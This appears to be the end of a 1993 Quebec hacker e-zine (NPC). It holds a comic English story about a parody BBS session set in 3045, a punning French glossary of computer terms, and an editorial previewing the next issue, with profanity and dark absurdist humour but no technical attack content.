+ + + + + + + +-+ + + + +-+ + +-+ +-+
+-------+
| |\ | |
| | \ | | NpShit Support Area of Quebec City!!!!!!!
| | \| |
+-------+
(m)essage (f)ile (b)ulletin (!)logoff
Main menu (c)Caillou Chanceux Jr.
Your command: M
{ Let's see the messages. }
----- M E S S A G E - M E N U -----
(R)ead (W)rite (S)can (Q)uick-Scan!
Combined mail: (C)hoose R(e)ad.....
(-) Previous (!) Logoff
Your command: E
(F)orward (R)everse (N)ew (I)ndividual (Q)uit: Forward
Combined section contains 567720550 messages,
Numbered from 1 to 567720550.
Start at which? (Enter/First (Yer crazy?!!)):
{ Fuck! I stroke F! Let's redo this. }
(F)orward (R)everse (N)ew (I)ndividual (Q)uit: New
Scanning new messages...
One moment, searching inter-tron message scanner...
Destroying messages 1 to 1...
Scanning nodelist...
One moment, connection on a sattelite...
Attacking Martian bases...
Computer is in DOS, one moment...
Fatal error, rebooting...
Coffee break, one moment...
Thanks for waiting!
MESSAGE: 567720548/567720550
BASE : NpShit Support
FROM: Fairy CompSt Jr.
TO: L'ogre Russe Jr.
SUBJECT: NpShit 456335
DATE : 45/14/56
Salut L'ogre! Hahaa! Hey NpShit numro 456335 devrait sortir bientt
mais je me demande ben de quoi on va parler... a te tenterait-tu de
faire un article sur les poubelles du Bell? a serait original!
Sli!
Fairy Compst JR (Le arrire-arrire-arrire-petit-fils de l'autre mongole)
(-/+) Replies...
(R)eply (B)ack (N)ext (J)ump (Q)uit (!=/*): Reply
{ Fairy Compst made an ENORMOUS mistake. Fuck him!!! }
Posting message to: Fairy Compst
Subject: NpShit 456335
One moment, loading editor...
Creating temporary file...
Please wait, this is only an Intel 8486!
Searching lost clusters...
Line editor. Word will wrap if you press [Enter] at the end of each
line. Blank line will bring you to the editor options.
1>
Message Commands: (C)ontinue (Q)uote (S)ave (A)bort: Quote
1>FCJ>Salut L'ogre! Hahaa! Hey NpShit numro 456335 devrait sortir bientt
2>FCJ>mais je me demande ben de quoi on va parler... a te tenterait-tu de
3>FCJ>faire un article sur les poubelles du Bell? a serait original!
4>FCJ>
5>FCJ>Sli!
6>FCJ>Fairy Compst JR (Le fils de l'autre)
7>.
8>HEY! You don't know this is an ENGLISH story! If you talk in
9>French, people in other countries where NpShit is distributed
10>won't understand a word from what you said!
11>.
12>L'oGrE rUssE jR
13>
Message Commands: (C)ontinue (Q)uote (S)ave (A)bort: Save
{ This is a good job done. I hope he won't redo this stupid
mistake again..! }
Saving message...
Scanning for viruses...
Checking for message INTEGRITY, please wait...
Verifying English syntax...
Sending garbage for fun: þúþý
Message lost.
That's a joke.
Thanks for not suiciding yerself.
{ Argggghhhhh! This is a BIT long... Ah! I'll download the
last NpShit release! This way you'll see how xfers are
powerful in 3045! }
Uh-Oh, you're CHATTED by the SysOp Daniel Boudin Jr!
{ FUCK IT ALL!! }
Hi L'ogre Russe Jr., this is Daniel Boudin Jr.
salur
Hey! You have to speak in English!
qeus ta di jai pa comprit
Stupid Human Behavior! You're paid for being our official NpShit
supporter, so please can you WRITE IN ENGLISH?!?!
ign qes ta lodre ruse je cath pa se qe tu di
cls
Esti de moron, fais ESC au plus criss, chu dans une histoire
SERIEUSE!
a ok ma te chater taleur parse qe jai de qoi a demande
Ben oui ben oui ENVOYE!
cest ou le esc
Laisse faire m'a sortir moi-mme!!
þj-}a|þp¢¥
NO CARRIER
A/
CONNECT 658768483893
Welcome on
+---+ +---+ + +---+ +---+ +-+-+ + + + + +-+-+
| | | | | | | | | | Stop
Future BBS 1465.676.001 logon
Name : L'ogre Russe Jr.
Password: ******
Choose Language:
1 - English
2 - English
3 - English
Which language? 1
{ What a STUPID board program! It doesn't remembers the
language you use or what?? }
Welcome L'ogre Russe Jr. on Galactwit BBS.
You are the 785747894858th caller.
Press [Enter]
Grumaute Editorial 4783.89á (c)3045 by David Esturgeon from Bigoudeware
Sorry (c)CailStop
+-+-+ +-+ + +-+ + +-+-+ +-+ +-+ + + +
| | | | | | | | | | | | | | | | | |
| | | +-+ | | | | | | | +-+ | | | | |
| | | | | | | | | | | | | | | | | |
+ + + + + + + +-+ + + + +-+ + +-+ +-+
+-------+
| |\ | |
| | \ | | NpShit Support Area of Quebec City!!!!!!!
| | \| |
+-------+
(m)essage (f)ile (b)ulletin (!)logoff
Main menu (c)Caillou Chanceux Jr.
Your command: N
{ You will now enter the NpShit secret & private area!! WOW!
Wonderful! We will also download the latest release
available! }
--------------
NPSHIT SUPPORT
--------------
(D)ownload NpShit
(U)pload NpShit
(W)rite a PRIVATE letter to NpShit
(R)ead PUBLIC replies from NpShit
(-) Return to main menu
Ansi (c)Caillou Chanceux Jr.
Your command: D
Protocols:
(A * indicates 3-dimensional xfer available)
(X)modem
(Y)modem
Ymodem-(G)
(Z)modem
Zy(R)ion Jr
(H)S/Link Jr
* (F)uture Protocol
Protocol: Future Protocol
{ Future Protocol is the only protocol that doesn't ask for
the files to download before downloading! It is very great! }
* Now fetching protocol program, FileDort is ready to SEND! *
{ Well, That's dull. I should have choosen SuperZModem to
play Tetris while downloading. Ah! It's finished! It's
because we have 658768483893 bauds modems! }
Analyzing downloads...
Updating FILES.BBS...
Updating USERS.BBS...
Updating DOWNLOADS.DAT...
Updating SYSOP.DAT...
Updating NATACHA.GIF...
Checking for viruses...
There was a virus in one of your files!
Good luck!
Checking for file integrity...
Checking for text authors mental integrity...
Please wait...
Please wait...
Please wait...
Please wait...
Please wait...
874 error(s) found!
{ I think I'm going to go to bed... }
Perform another transfer now? (y/N): NOOOO!
Returning to BBS...
{ I really don't know what would be more dull than all
this... }
Uh-Oh, you're CHATTED by the SysOp Daniel Boudin Jr!
{ DO ANYONE HAVE A GUN????? }
Hi L'ogre Russe Jr., this is Daniel Boudin Jr.
salu
FUCK YA!
qoi
J'ai dit FUCK YA! FUCK YA FUCK YA FUCK YA catch-tu esti de crtin?
tu ecrit tros vit je conpren pa
Hannnnn... Qu'est-ce que tu veux?
bin ony a des problaim abec vieu crouton
Mphitso Jr?
oui il di qon est de la movaize propagand tk des mot jai pa comprit
Ah, c'est
cause de son texte qu'il uploade partout? Ben on va le
publier dans NpShit.
a ouin
Ben oui!
a bon
Bon peux-tu me laisser aller sur le bab?
ben jai pa trouver le esc encor
Cherche en haut
gauche du clavier?
non ya pa de esc ya rinqun trou avec pa de touche dedan ces mon
frere qi es partit avec jepensr
logr ruse
alo
alo
a non laise moi pa tousul mon frere vien de retrouve min esc
{ That night, L'ogre Russe have been found, dead, hanging a
gun. As you can see, in 3045, life isn't cute on Quebec
City's boards......
Surely because NpShit was still there. }
L'oGrE rUssE
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
Dictionnaire des niaiseries
courramment dites dans NpShit
par Paleolithic Parking Lot
Bon... Comme nous ne nous comprenons mme pas nous-mmes quand on
traduit des textes des revues anglaises, voici un dictionnaire que nous
nous sommes concocts et o, nous l'esprons, nous pigerons souvent pour
avoir l'air plus brillants.
ACOUSTIC MODEM
Modem qui ne fonctionne pas
l'lectricit.
Syn: Modem sec Ant: Modem lectrique
ACTIVITY LOG Terreur des leechers comme nous.
AMIGA Lire Ami Gars. Homme avec qui Dental Flush a des affinits.
Voir FAIRY COMPOST.
ANSI (1) Sorte de dessin.
(2) Ajoutez un N au dbut et c'est la premire blonde
Blitzcrest.
Rep: 2.
AUTOEXEC.BAT Batch file pour starter un char.
BASIC Langage ben trop compliqu pour rien. D'ailleurs, le nom
le dit.
BATCH FILE Langage extrmement puissant utilis par les Officiers
NpShit pour avoir l'air hot. Malheureusement on n'est pas
encore aussi hot que notre Dieu Loocif Hair... Mais a va
venir!
BBS (1) Belle Bbelle Stupide.
(2) Concours
Val-Blair: the Best B-S.
BLITZCREST Ami de Dental Flush. Hahahaha!
BOARD Tann.
BREAK CHARACTER
Caractre cass.
BUS Absorber du liquide. Ex: Blitcrest a BUS tout mon jus
d'orange.
C (1) 3me lettre de l'alphabet.
(2) Ma note en programmation.
CARRIER (1) Endroit o on trouve des pierres.
(2) Un gnrateur de pomes.
CHAT MODE Mode fline.
CHIP Sel et vinaigre.
COPY CON Commande pour faire des duplications de Blitzcrest.
DEFAULT On en a plein.
DEFAULT DRIVE Personne qui conduit trs mal.
DISQUE DUR Disquette qui fait du bruit quand vous l'chappez
terre.
DISQUE MOU Disquette en pte
modeler. N'existe pas.
DOORS Groupe de musique.
DOS Ce que vous avez en arrire du ventre.
DOWNLOAD Activit prfre des Officiers NpShit.
EDIT Le nom de la blonde
Blitzcrest.
EDLIN Ex-blonde
Blitzcrest.
HARD DISK Avant.
FLOPPY DISK Aprs.
FLOPPY DRIVE Conduite molle.
FLOW CONTROL Contrle des naissances.
FORMAT Mot utilis pour dsigner certaines grosseurs. Ex: Ce pot
est de FORMAT 250 ml.
HANDLE Poigne.
HOT KEY Pratique en hiver pour les serrures geles.
ID Ce que (c)Caillou Chanceux a
profusion pour ses ANSIs.
LAMER Mot interdit. C'est a qui faut dire, hein Dental Flush?
LAMERZ Spa mieux!
ROM Capitale de l'Italie.
RAM Outil de propulsion marine manuelle.
LINE NOISE ATM2
MAC 3 premires lettres du mot MacDonalds.
MEMORY LOCATION
Bail de 6 mois pour un usage temporaire de mmoire.
MONITOR Ref. TERRAIN DE JEU.
MORON Secte religieuse fucke. Stune gang de lamerZ! Oups, scuse
Dental Flush!
MOUSE Souris.
MOOSE Orignal.
OFF LINE Contraire de ligne ouverte. (Donc
guichet ferm)
OS/2 Le deuxime os.
PAGE Composante d'un livre.
PASCAL Nom de l'ex-chum
Blitzcrest.
PC Plus Criss. Ex: Traduisez ce texte pour NpShit au PC.
POST Concurrent de Kellog's.
RECORD Piton situ
cot de PLAY.
ROOT DIRECTORY Rpertoire o se trouve la bire.
SCAN Quand est-ce. Ex: SCAN qu'on s'en va?
SERIAL PORT Port crale.
SHIFT KEY Cl de changement de vitesse.
START BIT Aphrodisiaque.
STOP BIT Claude Ryan.
TERMINAL Type de phase.
TURNAROUND CHARACTER
Voir SRE.
UART Voir PIASSE RONDE.
UNIX Chais pas, probablement une mission au Canal Famille.
USER (1) Qui a t beaucoup utilis.
(2) Mot auquel il manque un S au dbut pour reprsenter
ce que fait (c)Caillou Chanceux les week-ends.
VIDEO Voir MADONNA.
VIDEO MONITOR Responsable d'un terrain de jeux lectronique.
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
þ<JÉþþ@þÚj[9þ}ELMCx¡þLÙg|rþIDcþ®¹ýv~-¤¢.»YCþúþpAþ;³ »~þ«t=þþ"L
Tous ceux qui trouveront la signification de ce message cod gagneront
un voyage en floride pour huit personnes, avec limousine, jet priv,
chambre d'htel 5 toiles pouvant accueillir 12 personnes (pour une orgie
mettons) et 5000$ en argent de poche. (De poche, c'est mieux que de
Monopoly. (Ok, j'avoue que la joke est poche))
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
IL Y A UN PETIT PEU DE NOUS AUTRES LA DEDANS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
LE MOT DE LA FIN
par
Blitzkreig
Ayoye! Je viens d'imprimer, en format Word Perfect (caractre par dfaut)
NPC-004! J'ai l'impression que Merlin L'Emmerdeur va s'en prendre
nous
aprs ce numro, parce que si tous les lecteurs de NPC impriment leur
copie, il va bien falloir coucher 3 ou 4 forts! Avez-vous vu l'paisseur
de la chose?
D'un autre ct, nos dtracteurs ont raison: NPC est dangereux! En effet,
il s'agirait qu'un seul innocent se fasse frapper d'aplomb avec une copie
du #4 pour qu'il succombe
ses blessures!
Aidez-nous
tre encore plus dangereux: faites-nous parvenir vos textes!
Le mois prochain, les suites promises sur Datapac, quifax, les out-dial
de VMB, un article sur la SPA, les smart drugs, les Unix, les Vax, Steve
Jackson Games, plus nos chroniques rgulires par Merlin L'Emmerdeur,
Santa Claus, et tous les autres! Un rapport circonstantiel sur le
droulement du meeting 2600
New-York! Et je ne vous parle pas des
surprises! (parce que moi-mme, je n'en ai aucune foutue ide...)
Laissez-nous un post sur nos BBS ou sur Internet, ou un message sur notre
VMB, pour nous dire comment vous avez aim "la ride" ce mois-ci. Ou mieux
encore, crivez-nous un mot song si vous dsirez tre publis dans le
courrier du lecteur du numro 5.
NPC-005 sortira le 25 mars! Courez dj
acheter votre rame de papier! Et
entretemps, venez lire PHUN WEEK ONLINE!
NPC RULES IN '93
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
IL N'Y A PLUS DE SERVICE AU NUMERO QUE VOUS AVEZ COMPOSE
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ